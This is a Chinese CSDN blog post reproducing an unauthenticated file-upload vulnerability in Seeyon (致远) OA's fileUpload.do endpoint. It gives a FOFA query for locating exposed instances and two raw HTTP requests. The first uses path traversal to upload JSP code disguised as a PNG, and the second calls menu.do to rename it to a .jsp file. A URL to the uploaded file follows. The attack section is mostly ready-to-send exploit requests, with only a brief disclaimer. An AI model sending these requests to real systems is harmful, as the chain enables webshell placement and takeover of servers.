致远互联 OA fileUpload.do 文件上传漏洞

最新推荐文章于 2024-06-18 21:40:57 发布
最新推荐文章于 2024-06-18 21:40:57 发布
阅读量843 收藏
点赞数 17
文章标签: 安全 web安全 致远互联 OA fileUpload.do 文件上传漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wan___she__pi/article/details/138163263
版权
本文介绍了致远OA这款企业级办公自动化软件中发现的文件上传漏洞,详细描述了漏洞的复现过程,强调了安全使用的重要性。
摘要由CSDN通过智能技术生成

声明:

本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

简介

致远OA是一款企业级办公自动化软件,提供了办公流程管理、文档管理、协同办公、知识管理等功能。它可以帮助企业实现信息化办公,提高工作效率和协同能力。

致远OA是fileUpload.do存在文件上传漏洞

资产搜索

fofa

app="FE-协作平台" || title="协同管理软件 V5.6SP1"

漏洞复现

POST /seeyon/autoinstall.do/../../seeyon/fileUpload.do?method=processUpload HTTP/1.1
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: multipart/form-data; boundary=skdHHhNHjhnUgerSexsksboundary
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)

--skdHHhNHjhnUgerSexsksboundary
Content-Disposition: form-data; name="type"


--skdHHhNHjhnUgerSexsksboundary
Content-Disposition: form-data; name="extensions"

png
--skdHHhNHjhnUgerSexsksboundary
Content-Disposition: form-data; name="applicationCategory"


--skdHHhNHjhnUgerSexsksboundary
Content-Disposition: form-data; name="destDirectory"


--skdHHhNHjhnUgerSexsksboundary
Content-Disposition: form-data; name="destFilename"


--skdHHhNHjhnUgerSexsksboundary
Content-Disposition: form-data; name="maxSize"


--skdHHhNHjhnUgerSexsksboundary
Content-Disposition: form-data; name="isEncrypt"

false
--skdHHhNHjhnUgerSexsksboundary
Content-Disposition: form-data; name="file1"; filename="1.png"
Content-Type: Content-Type: application/pdf

<% out.println("hello test");%>
--skdHHhNHjhnUgerSexsksboundary--

POST /seeyon/autoinstall.do/../../seeyon/privilege/menu.do HTTP/1.1
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)
Content-Length: 67

method=uploadMenuIcon&fileid=5668550147192603189&filename=ceshi.jsp

 

http://127.0.0.1/seeyon/main/menuIcon/ceshi.jsp

cn_大腿
关注
  • 17
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
致远OA fileUpload.do 前台文件上传绕过漏洞复现(XVE-2024-8166)
0xSec
04-08 2312
致远互联-OA 接口 fileUpload.do 接口处存在文件上传漏洞,未经身份验证的远程攻击者可通过目录遍历的方式绕过上传接口限制,并利用menu.do接口替换上传文件的fileid值实现webshell上传到服务器,获取服务器权限,控制整个 web 服务器。
漏洞复现】致远互联OA fileUpload.do 任意文件上传漏洞
qq_67810151的博客
04-09 863
致远互联OA fileUpload.do接口处存在文件上传漏洞,未经身份验证的远程攻击者可通过目录遍历的方式绕过上传接口限制,并利用menu.do接口替换上传文件的fileid值实现webshell上传到服务器,获取服务器权限。
漏洞复现】致远互联 OA fileUpload.do 文件上传漏洞
最新发布
qq_34914659的博客
06-18 987
致远OA是一款企业级办公自动化软件,提供了办公流程管理、文档管理、协同办公、知识管理等功能。它可以帮助企业实现信息化办公,提高工作效率和协同能力。该系统fileUpload.do存在文件上传漏洞
致远OA Session泄露 任意文件上传漏洞
热门推荐
maverickpig的博客
07-19 1万+
网络安全自学日志-漏洞复现篇:致远OA Session泄露 任意文件上传漏洞 文章来自https://www.linuxlz.com/aqld/2104.html 工作中遇到的漏洞,记录一下 漏洞描述 致远OA通过发送特殊请求获取session,在通过文件上传接口上传webshell控制服务器 漏洞影响 致远OA 漏洞复现 FOFA title=“致远” 首先是一个获取管理cookie的漏洞。然后上传压缩文件进行解压。达到getshell的目的 POST /seeyon/thirdpartyControl
weblogic中servlet报404_【知道创宇404实验室】致远OA系统远程任意代码执行高危安全漏洞预警...
weixin_39989973的博客
01-01 168
今日(2019年6月26日),互联网上有安全研究者预警并发布了关于致远OA系统的高危安全漏洞,攻击者可以通过某接口漏洞在未授权的情况下实现远程任意代码执行,最终控制整个系统权限。据悉致远OA系统是由用友致远互联旗下协同管理软件系统,在国内很多央企、大型公司都有广泛应用。知道创宇404实验室立即启动漏洞应急流程,确定该漏洞存在致远OA系统某些型号及版本中某Servlet接口缺少必要的安全过...
致远OA文件上传漏洞(含批量检测POC)
今天是几号的博客
03-21 1万+
由于致远OA旧版本某些接口存在未授权访问,以及部分函数存在过滤不足,攻击者通过构造恶意请求,可在无需登录的情况下上传恶意脚本文件,从而控制服务器。致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3。致远OA A6、A8、A8N (V8.0SP2,V8.1,V8.1SP1)致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3。致远OA G6、G6N (V8.1、V8.1SP1)。致远OA V6.0、V6.1SP1、V6.1SP2。致远OA V7.1、V7.1SP1。
致远互联-OA前台fileUpload.do存在任意文件上传(含批量验证poc)
weixin_43567873的博客
04-28 232
致远互联-OA前台fileUpload.do存在任意文件上传(含批量验证poc)
致远OA wpsAssistServlet接口存在任意文件上传漏洞
weixin_44304678的博客
11-02 623
致远OA互联新一代智慧型协同运营平台以中台的架构和技术、协同、业务、连接、数据的专 业能力,夯实协同运营中台的落地效果;在协同运营平台全面升级的基础上,V8.0深耕大型企业管理模式、运营机制,进一步强化“协同”在管理中的价值,推动大中型企业、集团企业、国资以及高新技术企业的管理模式升级,帮助企业构筑全程、全域、全端的运营和服务能力,提升人员效率和组织绩效,赋能企业数字化、智能化发展。作者对使用该文章导致的任何直接或间接损失不承担任何责任。该文章仅用于授权测试,任何未经授权的测试均属于非法行为。
基于fileupload.js文件上传
11-19
"基于fileupload.js文件上传"的主题涉及了Ajax、Mvc以及fileupload.js这个JavaScript库,这些都是实现高效、用户友好的文件上传的关键技术。下面将详细阐述这些知识点。 首先,Ajax(Asynchronous JavaScript and ...
基于apache commons.fileupload文件上传组件
07-17
在创建一个基于Apache Commons FileUpload文件上传组件时,通常会包含以下步骤: 1. 创建`DiskFileItemFactory`实例。 2. 使用工厂创建`ServletFileUpload`实例,设置大小限制。 3. 解析`HttpServletRequest`对象...
基于apache commons.fileupload文件上传组件,改进了上传速度
07-17
apache commons.fileupload上传组件在上传文件时,在调用parseRequest方法时,先将输入流上传到服务器临时目录,在之后的文件处理过程中,再将临时目录下保存的文件复制到指定的目录,多了一道转储步骤。本实现抽取...
jquery.fileupload.js相关js文件
11-04
Web开发中,文件和图片上传功能是一项不可或缺的功能,而jQuery.fileupload.js是实现这一功能的优秀插件。它以其简洁的API和强大的功能,使得文件上传变得更加简单易用。本文将详细探讨jQuery.fileupload.js的相关...
FileUpload.zip
12-16
《使用FileUpload实现文件上传详解》 在信息技术领域,文件上传功能是许多应用程序不可或缺的一部分,尤其是在Web应用中。本文将详细解析如何利用FileUpload组件来实现在本地服务器上进行文件上传的功能,以此来...
致远OA wpsAssistServlet 任意文件上传漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
11-17 971
致远OA互联新一代智慧型协同运营平台以中台的架构和技术、协同、业务、连接、数据的专 业能力,夯实协同运营中台的落地效果;以移动化、AI智能推进前台的应用创新,实现企业轻量化、智能化业务场景,促进企业全过程管理能效,赋予企业协同工作和运营管理的新体验。
致远oa wpsassistservlet任意文件上传漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-29 2153
致远OA是一款流行的协同管理软件,在各中、大型企业机构中广泛使用。致远oa wpsassistservlet漏洞由于致远OA旧版本某些接口能被未授权访问,并且部分函数存在过滤不足,攻击者通过构造恶意请求,权限绕过漏洞,可在无需登录的情况下上传恶意脚本文件,从而控制getshell。致远oa wpsassistservlet漏洞影响范围,致远oa wpsassistservlet漏洞漏洞检测 测试POC:http://1.2.3.4:80/seeyon/thirdpartyController.do.css/
漏洞复现】致远OA wpsAssistServlet接口存在任意文件上传漏洞
失心少年
11-18 407
在协同运营平台全面升级的基础上,V8.0深耕大型企业管理模式、运营机制,进一步强化“协同”在管理中的价值,推动大中型企业、集团企业、国资以及高新技术企业的管理模式升级,帮助企业构筑全程、全域、全端的运营和服务能力,提升人员效率和组织绩效,赋能企业数字化、智能化发展。本文所提供的工具仅用于学习,禁止用于其他!漏洞链接:https://127.0.0.1/seeyon/wpsAssistServlet?
c# jquery.fileupload.js
05-26
c# jquery.fileupload.js 这个名字有些混淆,因为它包含了两个不同的技术:C# 和 jQuery 的文件上传插件 fileupload.js。 C# 是一种面向对象的编程语言,通常用于开发 Windows 应用程序、Web 应用程序和服务端应用程序。而 jQuery 是一个 JavaScript 库,用于简化 HTML 文档遍历、事件处理、动画效果和 Ajax 操作等常见任务。 fileupload.js 是 jQuery 的一个文件上传插件,可以通过 AJAX 实现无刷新上传文件,并提供了很多可配置的选项和事件处理函数,非常方便易用。 所以,c# jquery.fileupload.js 可能是指使用 C# 语言编写的服务器端代码,结合 jQuery 插件 fileupload.js 实现文件上传功能。比如,在 ASP.NET MVC 项目中使用 jQuery File Upload 插件实现文件上传
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值